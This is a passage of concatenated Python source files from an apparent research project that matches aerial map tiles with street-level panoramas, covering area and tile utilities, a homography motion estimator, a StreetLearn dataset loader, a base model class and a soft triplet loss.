'SP50NW': 'aerial_tiles',
'ST57SE2014' : 'ST57SE_aerial_tiles_2014',
'ST57SE2016' : 'ST57SE_aerial_tiles_2016',
'ST57SE2017' : 'aerial_tiles'
}
return directories[areaname]
def get_readable_name(areaname):
areas = {
'London_test' : 'London',
'SP50NW': 'Oxford',
'ST57SE2014' : 'Bristol 2014',
'ST57SE2016' : 'Bristol 2016',
'ST57SE2017' : 'Bristol 2017'
}
return areas[areaname]
class Area():
def __init__(self, name, dataroot, results_dir, extent=None, zoom=18):
self.name = name
self.dataroot = dataroot
self.results_dir = results_dir
self.zoom = zoom
self.dir = get_aerial_directory(name)
self.readable_name = get_readable_name(name)
total_extent_of_the_area = get_area_extents()[name]
self.totalbbox = total_extent_of_the_area
if extent is None:
# Remove 5% in edges
strip_lat = 0.05*(total_extent_of_the_area[2] - total_extent_of_the_area[0])
strip_lon = 0.05*(total_extent_of_the_area[3] - total_extent_of_the_area[1])
extent_without_edges = [total_extent_of_the_area[0]+strip_lat,
total_extent_of_the_area[1]+strip_lon,
total_extent_of_the_area[2]-strip_lat,
total_extent_of_the_area[3]-strip_lon]
else:
extent_without_edges = extent
self.workingbbox = extent_without_edges
self.world_size_x = haversine(extent_without_edges[0],
extent_without_edges[1],
extent_without_edges[0],
extent_without_edges[3])
self.world_size_y = haversine(extent_without_edges[0],
extent_without_edges[1],
extent_without_edges[2],
extent_without_edges[1])
self.arcllat = self.workingbbox[2]-self.workingbbox[0]
self.arcllon = self.workingbbox[3]-self.workingbbox[1]
# Define an inner boundary where the robot should start to turn
strip_lat = 0.10*(extent_without_edges[2] - extent_without_edges[0])
strip_lon = 0.10*(extent_without_edges[3] - extent_without_edges[1])
innerbbox = [extent_without_edges[0]+strip_lat,
extent_without_edges[1]+strip_lon,
extent_without_edges[2]-strip_lat,
extent_without_edges[3]-strip_lon]
self.innerbbox = innerbbox
def get_routes(self, seed=440):
path = os.path.join('aerial','routes', self.name + '_' + str(seed) + '.npz')
routes = np.load(path)['routes']
return routes
def get_commands(self, seed=440):
path = os.path.join('aerial', 'routes', self.name + '_' + str(seed) + '.npz')
routes = np.load(path)['commands']
return routes
def get_working_bbox_in_tile_coordinates(self):
extent =self.workingbbox
xmin, ymin = deg2num(extent[2],extent[1],self.zoom)
xmax, ymax = deg2num(extent[0],extent[3],self.zoom)
return [ymin, xmin, ymax, xmax]
def get_total_bbox_in_tile_coordinates(self):
extent =self.totalbbox
xmin, ymin = deg2num(extent[2],extent[1],self.zoom)
xmax, ymax = deg2num(extent[0],extent[3],self.zoom)
return [ymin, xmin, ymax, xmax]
def get_area_size_in_tiles(self):
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
W = xmax - xmin + 1
H = ymax - ymin + 1
return (H,W)
def get_arclength(self):
arcllat = self.workingbbox[2]-self.workingbbox[0]
arcllon = self.workingbbox[3]-self.workingbbox[1]
return (arcllat,arcllon)
def get_tile_coords(self):
coords = []
tile_zooms = [self.zoom]
for z in tile_zooms:
x = np.arange(self.xmin,self.xmax+1,1)
y = np.arange(self.ymin,self.ymax+1,1)
x = np.tile(x,self.H)
y = np.repeat(y,self.W)
z = np.tile(z,self.H*self.W)
grid = np.stack([x,y,z],1)
coords.append(grid)
coords = np.concatenate(coords, 0)
return coords
def get_map_grid_for_mpl(self):
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
max_lat, min_lon = num2deg(xmin, ymin, self.zoom)
min_lat, max_lon = num2deg(xmax+1,ymax+1, self.zoom)
grid = [min_lon,max_lon,min_lat,max_lat]
return grid
def get_map(self, style='ordnance',filepath=None):
if filepath is None:
filename = os.path.join('aerial','maps',self.name + '_' + style + '.png')
else:
filename = filepath
area_map = cv2.imread(filename)
if area_map is None:
raise FileExistsError(filename)
return area_map
def create_area_map(self, H, W, save=False, name=None):
area_map = []
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
for i in range( ymin, ymax+1):
row = []
for j in range(xmin, xmax+1):
coords = (int(j),int(i), self.zoom)
mapa = Tile(coords, self.dataroot).get_tile(domain='map')
#mapa = cv2.resize(mapa,(64,64))
row.append(mapa)
row = np.concatenate(row,1)
area_map.append(row)
area_map = np.concatenate(area_map, axis=0)
area_map = cv2.resize(area_map,(W,H))
if save:
map_name = self.name + '_ordnance.png' if name is None else name
cv2.imwrite(os.path.join('aerial','maps', map_name), area_map)
return area_map
def m2deg(self, disp_in_meters):
arclengthlat = disp_in_meters[0] * self.arcllat / (1000*self.world_size_y)
arclengthlon = disp_in_meters[1] * self.arcllon / (1000*self.world_size_x)
return (arclengthlat, arclengthlon)
def get_map_descriptors(self, model, epoch='latest'):
dataFilename = os.path.join( self.results_dir, model, epoch + '_' + self.name + '_z_' + str(self.zoom) + '.npz')
descriptors = np.load(dataFilename)['X']
area_coords = np.load(dataFilename)['coords']
# Take descriptors of the subarea only
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
indices_x = np.arange( xmin , xmax + 1 ) - area_coords[0,:,0,3].min()
indices_y = np.arange( ymin , ymax + 1 ) - area_coords[:,0,0,2].min()
indices_x = np.expand_dims(indices_x,0).astype(int)
indices_y = np.expand_dims(indices_y,1).astype(int)
descriptors = descriptors[indices_y,indices_x]
working_coords = area_coords[indices_y,indices_x]
return (descriptors, working_coords)
def show(self):
area_map = self.get_map(1280, 720)
cv2.imshow(self.name, area_map)
cv2.waitKey(0)
if __name__ == "__main__" :
dataroot = os.path.join(os.environ['DATASETS'],'digimap_data')
area = Area('ST57SE', dataroot)
mymap = area.create_area_map(512,512)
cv2.imshow('mymap', mymap)
cv2.waitKey(0)
cv2.destroyWindow('mymap')
```
#### File: Image-Map-Embeddings/aerial/grid_utils.py
```python
import numpy as np
from aerial.tile import deg2num, num2deg
from math import sqrt
def deg2num_rect(extent, zoom=18):
x_min, y_min = deg2num(extent[2],extent[1], zoom)
x_max, y_max = deg2num(extent[0],extent[3], zoom)
return [x_min, y_min,x_max, y_max]
def get_XY_size(extent, zoom=18):
XYextent = deg2num_rect(extent, zoom)
H = XYextent[3] - XYextent[1]
W = XYextent[2] - XYextent[0]
return H,W
def get_uniform_coords_in_extent(extent, scale_factor=2, zoom=18):
H, W = get_XY_size(extent, zoom)
new_H = H * scale_factor
new_W = W * scale_factor
lat = np.linspace(extent[2], extent[0], new_H)
lon = np.linspace(extent[1], extent[3], new_W)
lon = np.tile(lon,new_H)
lat = np.repeat(lat,new_W)
z = np.tile(zoom,new_H*new_W)
coords = np.stack([lat,lon,z],1)
return coords
def get_extent(coords):
test = coords[0][0].item()
isXY = test.is_integer()
if isXY:
min_x, min_y = coords[:,:2].min(0)
max_x, max_y = coords[:,:2].max(0)
z = coords[0,2].item()
max_lat, min_lon = num2deg(min_x, min_y, z)
min_lat, max_lon = num2deg(max_x+1, max_y+1, z)
extent = [min_lat, min_lon, max_lat, max_lon]
else:
min_lat, min_lon = coords[:,:2].min(0)
max_lat, max_lon = coords[:,:2].max(0)
extent = [min_lat, min_lon, max_lat, max_lon]
return extent, isXY
def get_grid(descriptors, original_extent, working_extent, scale_factor, zoom=18):
area_extent_xy = deg2num_rect(original_extent, zoom)
working_extent_xy = deg2num_rect(working_extent,zoom)
H,W = get_XY_size(original_extent, zoom)
new_H, new_W = H*scale_factor, W*scale_factor
min_x = (working_extent_xy[0] - area_extent_xy[0])*scale_factor
min_y = (working_extent_xy[1] - area_extent_xy[1])*scale_factor
max_x = (working_extent_xy[2] - area_extent_xy[0])*scale_factor
max_y = (working_extent_xy[3] - area_extent_xy[1])*scale_factor
descriptors = np.reshape(descriptors,(int(new_H),int(new_W),-1))
descriptors = descriptors[min_y:max_y+1,min_x:max_x+1]
return descriptors
def get_scale_factor(original_num_elements, current_num_elements):
return int(sqrt(current_num_elements / original_num_elements))
```
#### File: Image-Map-Embeddings/aerial/motion_estimate.py
```python
import cv2
import numpy as np
import math
class Homography():
def __init__(self, first_frame, verbose=False):
"""
Implements a class that estimates the Homography using point correspondances.
"""
self.old = first_frame
self.old_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY)
self.orb = cv2.ORB_create()
self.old_kp, self.old_des = self.orb.detectAndCompute(self.old_gray, None)
self.old_frame = first_frame
self.old_yaw = 0.0
self.old_t = np.array([0.0,0.0])
self.verbose = verbose
def estimate(self, frame):
""" This method estimates translation and yaw from the homography
"""
new_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
new_kp, new_des = self.orb.detectAndCompute(new_gray, None)
if new_des is not None and self.old_des is not None:
matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
matches = matcher.match(self.old_des, new_des)
matches = sorted(matches, key= lambda x:x.distance)
npoints = len(matches)
if npoints > 100:
points1 = np.zeros((len(matches),2), dtype=np.float32)
points2 = np.zeros((len(matches),2), dtype=np.float32)
for i,match in enumerate(matches):
points1[i, :] = self.old_kp[match.queryIdx].pt
points2[i, :] = new_kp[match.trainIdx].pt
h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
nransac = (mask==1).sum()
if nransac > 50:
matchesMask = mask.ravel().tolist()
img = cv2.drawMatches(self.old_frame, self.old_kp, frame, new_kp, matches, None, matchesMask=matchesMask)
hn = h / h[2,2]
t = hn[:2,2]
sy = math.sqrt(hn[0,0]*hn[0,0] + hn[1,0]*hn[1,0])
singular = sy < 1e-6
if not singular:
yaw = math.atan2(hn[1,0],hn[0,0])
else:
yaw = 0
self.old_yaw = yaw
self.old_t = t
else:
if self.verbose:
print("Warning! not enough points in ransac")
yaw = self.old_yaw
t = self.old_t
img = frame
else:
if self.verbose:
print("Warning! not enough matched points")
yaw = self.old_yaw
t = self.old_t
img = frame
else:
yaw = self.old_yaw
t = self.old_t
img = frame
self.old_frame = frame
self.old_kp = new_kp
self.old_des = new_des
return yaw, t, img
```
#### File: Image-Map-Embeddings/data/streetlearn_dataset.py
```python
import cv2
import random
import numpy as np
import torch
from PIL import Image
import torchvision.transforms as transforms
from slutils.area import Area
from slutils.utils import rotate_panorama
from data.base_dataset import BaseDataset
from data.transforms import AddGaussianNoise, RandomErasing
from utils.util import tensor2im
def random_crop(tile, size_t=224, size_final=128):
""" Crop and add noise to the tile"""
w, h = tile.shape[0:2]
delta = h - size_t
ht = np.random.randint(0, delta)
wt = ht
temp_tile = tile[ht:h-ht, wt:w-wt]
tile = cv2.resize(temp_tile, (size_final,size_final))
return tile
def get_transforms(preprocess):
transform_list = []
transform_list += [transforms.ToTensor()]
if 'normalize' in preprocess:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
if 'erasing' in preprocess:
transform_list += [RandomErasing(p=0.75, scale=(0.01, 0.10), ratio=(0.2, 0.8), value='random', inplace=True)]
if 'noise' in preprocess:
transform_list += [AddGaussianNoise(mean=0.0, std=0.01)]
return transforms.Compose(transform_list)
class StreetLearnDataset(BaseDataset):
"""A customized dataset Class for StreetLearn data """
@staticmethod
def modify_commandline_options(parser, is_train):
parser.set_defaults(dataroot='streetlearn', tile_size=128, area='train', domain=['X','Y'])
parser.add_argument('--pano_size', type=int, default=128, help='Panorama size')
parser.add_argument('--panorama_mode', type=str, default='list', help='Input mode for the panorama pano|grid|list')
parser.add_argument('--no_local_rotation', action='store_true', help='Disable rotations and fliping at location level')
parser.add_argument('--no_map_random_crop', action='store_true', help='Disable random cropping for the map tile')
parser.add_argument('--no_aligned', action='store_true', help='Disabled tile and panorama aligment')
parser.add_argument('--flips', action='store_true', help='If specified use flippling for data augmentation')
parser.add_argument('--no_rotations', action='store_true', help='Disable rotations for data augmentation')
if is_train:
parser.set_defaults(preprocess='erasing,normalize')
else:
parser.set_defaults(preprocess='normalize', batch_size=100, flips=False, num_augmentations=1, serial_batches=True)
return parser
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.area = Area(opt.area, opt.dataroot)
self.dataroot = opt.dataroot
def __getitem__(self, index):
""" Gets a sample location including augmentations.
Parameters:
index -- Index of the location.
Returns a dictionary that contains
X (tensor) - - Map tiles' tensor with shape [batch_size, num_augmentations, num_channels, width, heigth]
Y (tensor) - - Panoramas tensor with shape [batch_size, direction*, num_augmentations, num_channels, width, heigth]
* Only exists when panorama_mode is 'list'
labels (tensor) -- A tensor with the location labels
index (int) - - index of location
paths (str) - - Path to panorama (used for some visualizations)
"""
zooms = [18,19] if self.opt.isTrain else [self.opt.tile_zoom]
loc = self.area.get_location(index, zooms=zooms)
X, Y = [],[]
flip = (random.random() > 0.5) if self.opt.flips else False # It will be applied to both domains
rotation = 0.0 if self.opt.no_rotations else random.choice([0,-270,-180,-90]) # It will be applied to both domains
for _ in range(self.opt.num_augmentations):
# local rotation parameters
if not self.opt.no_local_rotation and not self.opt.no_rotations:
tile_rotation = random.choice([0,-270,-180,-90])
pano_rotation = random.uniform(-180,180) if self.opt.no_aligned else tile_rotation
else:
tile_rotation=rotation
pano_rotation=rotation
zoom = np.random.randint(18,20) if self.opt.isTrain else self.opt.tile_zoom
tile = loc.get_tile(zoom=zoom, rotation=tile_rotation, flip=flip)
if not self.opt.no_map_random_crop:
tile = random_crop(tile,size_final=self.opt.tile_size)
else:
if not (tile.shape[0] == self.opt.tile_size):
tile = cv2.resize(tile,(self.opt.tile_size,self.opt.tile_size))
tile = cv2.cvtColor(tile, cv2.COLOR_BGR2RGB)
tile = Image.fromarray(tile)
tile = get_transforms(self.opt.preprocess)(tile)
X.append(tile)
# Get panorama
if self.opt.panorama_mode == 'grid':
pano = [loc.get_snaps(size=self.opt.pano_size, mode='grid', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain)]
elif self.opt.panorama_mode == 'list':
pano = loc.get_snaps(size=self.opt.pano_size, mode='list', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain) #[F,L,R,B]
elif self.opt.panorama_mode == 'pano':
yaw = rotation + np.random.normal(0,5) # A small random rotation
pitch = np.random.normal(0,5)
roll = np.random.normal(0,5)
pano = loc.get_pano(flip=flip, size=(self.opt.pano_size*2,self.opt.pano_size))
pano = [rotate_panorama(pano, roll, pitch, yaw)]
else:
raise Exception('Panorama mode {} not found'.format(self.opt.panorama_mode))
for img in pano:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
img = get_transforms(self.opt.preprocess)(img)
Y.append(img)
X = torch.stack(X, dim=0)
Y = torch.stack(Y, dim=0)
if self.opt.panorama_mode == 'list':
lista = torch.chunk(Y, self.opt.num_augmentations, dim=0)
Y = torch.stack(lista, dim=0)
sample = {'X':X, 'Y':Y}
sample['labels'] = torch.full((1, self.opt.num_augmentations), index)
sample['paths'] = str(index) + '.jpg'
sample['index'] = index
return sample
def show_dataset(self,examples=2):
for _ in range(examples):
index = np.random.randint(0,self.__len__())
sample = self.__getitem__(index)
print(sample['Y'].size())
if self.opt.panorama_mode == 'list':
snaps = torch.chunk(sample['Y'],4,dim=1)
pano = torch.cat(snaps, dim=4).squeeze()
else:
pano = sample['Y']
for i in range(self.opt.num_augmentations):
X = sample['X'][i]
Y = pano[i]
imA = tensor2im(X.view(1,X.size(0),X.size(1),X.size(2)))
imB = tensor2im(Y.view(1,Y.size(0),Y.size(1),Y.size(2)))
imA = cv2.cvtColor(imA, cv2.COLOR_RGB2BGR)
imB = cv2.cvtColor(imB, cv2.COLOR_RGB2BGR)
if imA.shape[0] != imB.shape[0]:
cv2.imshow("Tile", imA)
cv2.imshow("Panorama", imB)
else:
img = np.concatenate((imA, imB),axis=1)
cv2.imshow("Location", img)
cv2.waitKey(0)
def __len__(self):
"""Return the total number of images in the dataset."""
return self.area.N
```
#### File: Image-Map-Embeddings/models/base_model.py
```python
import os
import torch
import numpy as np
from collections import OrderedDict
from abc import ABC, abstractmethod
from .utils import get_scheduler
class BaseModel(ABC):
"""This class is an abstract base class (ABC) for models.
To create a subclass, you need to implement the following five functions:
-- <__init__>: initialize the class; first call BaseModel.__init__(self, opt).
-- <set_input>: unpack data from dataset and apply preprocessing.
-- <forward>: produce intermediate results.
-- <optimize_parameters>: calculate losses, gradients, and update network weights.
-- <modify_commandline_options>: (optionally) add model-specific options and set default options.
"""
def __init__(self, opt):
"""Initialize the BaseModel class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
When creating your custom class, you need to implement your own initialization.
In this function, you should first call <BaseModel.__init__(self, opt)>
Then, you need to define five lists:
-- self.loss_names (str list): specify the training losses that you want to plot and save.
-- self.model_names (str list): define networks used in our training.
-- self.visual_names (str list): specify the images that you want to display and save.
-- self.optimizer_names (str list): list names of optimizers to be saved in disk
-- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example.
"""
self.opt = opt
self.gpu_ids = opt.gpu_ids
self.isTrain = opt.isTrain
self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu') # get device name: CPU or GPU
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name) # save all the checkpoints to save_dir
if opt.preprocess != 'scale_width': # with [scale_width], input images might have different sizes, which hurts the performance of cudnn.benchmark.
torch.backends.cudnn.benchmark = True
self.loss_names = []
self.model_names = []
self.visual_names = []
self.optimizer_names = []
self.optimizers = []
self.image_paths = []
self.metric = 0 # used for learning rate policy 'plateau'
self.metric_value = None # Best metric
self.total_iters = 0
self.epoch_iters = 0
# Set the seed
if opt.seed != -1:
np.random.seed(opt.seed)
#torch.set_deterministic(True)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
torch.cuda.manual_seed_all(opt.seed) # if multi-GPU.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
@staticmethod
def modify_commandline_options(parser, is_train):
"""Add new model-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
return parser
@abstractmethod
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): includes the data itself and its metadata information.
"""
pass
@abstractmethod
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
pass
@abstractmethod
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
pass
def setup(self, opt):
"""Load and print networks; create schedulers
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
if self.isTrain:
self.schedulers = [get_scheduler(optimizer, opt) for optimizer in self.optimizers]
if not self.isTrain or opt.continue_train:
load_suffix = 'iter_%d' % opt.load_iter if opt.load_iter > 0 else opt.epoch
self.load_networks(load_suffix)
self.print_networks(opt.verbose)
def eval(self):
"""Make models eval mode during test time"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.eval()
def train(self):
"""Make model trainable"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.train()
def test(self):
"""Forward function used in test time.
This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop
It also calls <compute_visuals> to produce additional visualization results
"""
with torch.no_grad():
self.forward()
self.compute_visuals()
def compute_visuals(self):
"""Calculate additional output images for visdom and HTML visualization"""
pass
def get_image_paths(self):
""" Return image paths that are used to load current data"""
return self.image_paths
def update_learning_rate(self):
"""Update learning rates for all the networks; called at the end of every epoch"""
for scheduler in self.schedulers:
if self.opt.lr_policy == 'plateau':
scheduler.step(self.metric)
else:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate = %.7f' % lr)
def get_current_visuals(self):
"""Return visualization images. train.py will display these images with visdom, and save the images to a HTML"""
visual_ret = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
visual_ret[name] = getattr(self, name)
return visual_ret
def get_current_losses(self):
"""Return traning losses / errors. train.py will print out these errors on console, and save them to a file"""
errors_ret = OrderedDict()
for name in self.loss_names:
if isinstance(name, str):
errors_ret[name] = float(getattr(self, 'loss_' + name))
return errors_ret
def save_networks(self, prefix, epoch_count, epoch_iters=None, total_iters=None, metric_value=None):
"""Save all the networks and optimizers to the disk. It also saves the current iteration and optionally a performance metric.
Parameters:
prefix -- current epoch or any text prefix; used in the file name '%s_net_%s.pth' % (prefix, name)
epoch_count -- current epoch
epoch_iters -- count of current iterations in current epoch
total_iters -- total count of iterations
metric_value -- Metric value for current epoch (optional)
"""
# save networks
for name in self.model_names:
if isinstance(name, str):
save_filename = '%s_net_%s.pth' % (prefix, name)
save_path = os.path.join(self.save_dir, save_filename)
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
state_dict = net.module.state_dict()
else:
state_dict = net.state_dict()
ckpt = {'epoch_iters': epoch_iters,
'total_iters': total_iters,
'last_epoch': epoch_count,
'metric_value': metric_value,
'model_state_dict': state_dict,
}
if len(self.gpu_ids) > 0 and torch.cuda.is_available():
torch.save(ckpt, save_path)
else:
torch.save(ckpt, save_path)
# Save optimizers
for name in self.optimizer_names:
if isinstance(name, str):
save_filename = '%s_optimizer_%s.pth' % (prefix, name)
save_path = os.path.join(self.save_dir, save_filename)
optimizer = getattr(self, 'optimizer_' + name)
ckpt = {'epoch_iters': epoch_iters,
'total_iters': total_iters,
'last_epoch': epoch_count,
'metric_value': metric_value,
'optimizer_state_dict': optimizer.state_dict(),
}
if len(self.gpu_ids) > 0 and torch.cuda.is_available():
torch.save(ckpt, save_path)
else:
torch.save(ckpt, save_path)
def load_networks(self, prefix):
"""Load all the networks and optimizers (if training) from the disk. It also loads the current iteration and a performance metric.
Parameters:
prefix -- current epoch or any text prefix; used in the filename '%s_net_%s.pth' % (prefix, name)
"""
for name in self.model_names:
if isinstance(name, str):
load_filename = '%s_net_%s.pth' % (prefix, name)
load_path = os.path.join(self.save_dir, load_filename)
if os.path.isfile(load_path):
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
net = net.module
# Load checkpoint
ckpt = torch.load(load_path, map_location=str(self.device))
epoch_count = ckpt['last_epoch']
self.opt.epoch_count = epoch_count if prefix == 'latest' else epoch_count + 1
self.epoch_iters = 0 #ckpt['epoch_iters']
self.total_iters = ckpt['total_iters']
if self.isTrain:
self.metric_value = ckpt['metric_value'] if self.opt.initial_metric_value is None else self.opt.initial_metric_value
else:
self.metric_value = ckpt['metric_value']
net.load_state_dict(ckpt['model_state_dict'])
print('loaded the model from %s, n_epoch: %s num_iters: %s' % (load_path,epoch_count,self.total_iters))
else:
print("Warning file {} not found".format(load_path))
# Load optimizers
if self.isTrain:
for name in self.optimizer_names:
if isinstance(name, str):
load_filename = '%s_optimizer_%s.pth' % (prefix, name)
load_path = os.path.join(self.save_dir, load_filename)
if os.path.isfile(load_path):
optimizer = getattr(self, 'optimizer_' + name)
# Load checkpoint
ckpt = torch.load(load_path, map_location=str(self.device))
optimizer.load_state_dict(ckpt['optimizer_state_dict'])
print('loaded the optimizer from %s' % load_path)
else:
print("Warning file {} not found".format(load_path))
def print_networks(self, verbose):
"""Print the total number of parameters in the network and (if verbose) network architecture
Parameters:
verbose (bool) -- if verbose: print the network architecture
"""
print('---------- Networks initialized -------------')
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
num_params = 0
for param in net.parameters():
num_params += param.numel()
if verbose:
print(net)
print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))
print('-----------------------------------------------')
def set_requires_grad(self, nets, requires_grad=False):
"""Set requies_grad=Fasle for all the networks to avoid unnecessary computations
Parameters:
nets (network list) -- a list of networks
requires_grad (bool) -- whether the networks require gradients or not
"""
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
```
#### File: models/nets/softtriplet.py
```python
import torch
import torch.nn as nn
class softTriplet(nn.Module):
def __init__(self, alpha, squared, device):
super(softTriplet, self).__init__()
self.alpha = alpha
self.squared = squared
self.device = device
def _pairwise_distances(self, X,Y):
dot_product = torch.matmul(X,torch.t(Y))
X_norm = torch.norm(X,p=2, dim=1, keepdim=True)
Y_norm = torch.norm(Y,p=2, dim=1, keepdim=True)
# Compute the pairwise distance matrix as we have:
# ||a - b||^2 = ||a||^2 - 2 <a, b> + ||b||^2
# shape (batch_size, batch_size)
distances = torch.pow(X_norm,2) - 2.0 * dot_product + torch.pow(torch.t(Y_norm),2)
# Because of computation errors, some distances might be negative so we put everything >= 0.0
distances = torch.max(distances, torch.zeros_like(distances))
if not self.squared:
# Because the gradient of sqrt is infinite when distances == 0.0 (ex: on the diagonal)
# we need to add a small epsilon where distances == 0.0
mask = torch.eq(distances, 0.0).float()
distances = distances + mask * 1e-16
distances = torch.sqrt(distances)
# # Correct the epsilon added: set the distances on the mask to be exactly 0.0
distances = distances * (1.0 - mask)
return distances
def _get_same_label_mask(self, labels):
"""Return a 2D mask where mask[a, p] is True if a and p have same label.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
labels = labels.expand(labels.shape[0],labels.shape[0])
labels_equal = torch.eq(labels, labels.t())
return labels_equal
def _get_anchor_positive_triplet_mask(self, labels):
"""Return a 2D mask where mask[a, p] is True iff a and p are distinct and have same label.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
indices_equal = torch.eye(labels.size()[0], device=self.device).byte() # There is going to be an issue here in a future
indices_not_equal = ~ indices_equal
labels_equal = self._get_same_label_mask(labels)
mask = indices_not_equal & labels_equal
return mask
def _get_anchor_negative_triplet_mask(self, labels):
"""Return a 2D mask where mask[a, n] is True iff a and n have distinct labels.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
# Check if labels[i] != labels[k]
# Uses broadcasting where the 1st argument has shape (1, batch_size) and the 2nd (batch_size, 1)
labels_equal = self._get_same_label_mask(labels)
mask = ~ labels_equal
return mask
def _get_X_Y_triplet_mask(self, labels):
"""Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid.
Triplet (Xi, Yj, Yk) is valid if:
labels[i] == labels[j] and labels[i] != labels[k]
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
"""
same_label_mask = self._get_same_label_mask(labels)
li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0)
lj_not_equal_lk = ~ li_equal_lj.permute(2,1,0)
valid_triplet_mask = li_equal_lj & lj_not_equal_lk
return valid_triplet_mask
def _get_triplet_mask(self, labels):
"""Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid.
Triplet (Xi, Xj, Xk) is valid if:
i != j != k
labels[i] == labels[j] and labels[i] != labels[k]
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
"""
# Indices mask
i_not_equal_j = ~torch.eye(labels.size()[0], device=self.device).expand(labels.size()[0],labels.size()[0],labels.size()[0]).bool().permute(2,1,0)
# Labels mask
same_label_mask = self._get_same_label_mask(labels)
li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0)
lj_not_equal_lk = ~li_equal_lj.permute(2,1,0)
valid_triplet_mask = (li_equal_lj & lj_not_equal_lk) & i_not_equal_j
return valid_triplet_mask
def batchall(self, X,labels,final_strategy):
pairwise_dist = self._pairwise_distances(X,X).expand(1,labels.size()[0],labels.size()[0])
# Compute a tensor with all the posible triplets
anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1]
anchor_negative_dist = pairwise_dist.permute(1,0,2)
# triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k
triplet_loss_tensor = torch.log( 1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist)))
triplet_loss = torch.mul(triplet_loss_tensor, self._get_triplet_mask(labels).float())
# Count the number of valid triplets (where triplet loss> 0)
valid_triplets = torch.gt(triplet_loss,1e-16).sum()
# Get the final mean triplet loss over all valid triplets
if final_strategy == "mean":
loss = triplet_loss.sum() / (valid_triplets + 1e-16)
return loss
elif final_strategy is "mean_all":
loss = triplet_loss.mean()
return loss
elif final_strategy is "sum":
loss = triplet_loss.sum()
return loss
else:
print("Final strategy not found")
def batch_all_X_Y(self, X, Y, labels,final_strategy):
pairwise_dist = self._pairwise_distances(X,Y).expand(1, labels.size(0), labels.size(0))
# Compute a tensor with all the posible triplets
anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1]
anchor_negative_dist = pairwise_dist.permute(1,0,2)
# triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k
triplet_loss_tensor = torch.log(1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist)))
triplet_loss = torch.mul(triplet_loss_tensor, self._get_X_Y_triplet_mask(labels).float())
# Count the number of valid triplets (where triplet loss> 0)
valid_triplets = torch.gt(triplet_loss,1e-16).sum()
# Get the final mean triplet loss over all valid triplets
if final_strategy == "mean":
loss = triplet_loss.sum() / (valid_triplets + 1e-16)
return loss
elif final_strategy is "mean_all":
loss = triplet_loss.mean()
return loss
elif final_strategy is "sum":
loss = triplet_loss.sum()
return loss
else:
print("Final strategy not found")
def batch_hard_X_Y(self, X, Y, labels):
pairwise_distances = self._pairwise_distances(X,Y)
# Valid anchor positives x-y have same label
anchor_positive_distance = torch.mul(pairwise_distances, self._get_same_label_mask(labels).float())
hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1)
# Valid anchor negatives x-y have different label
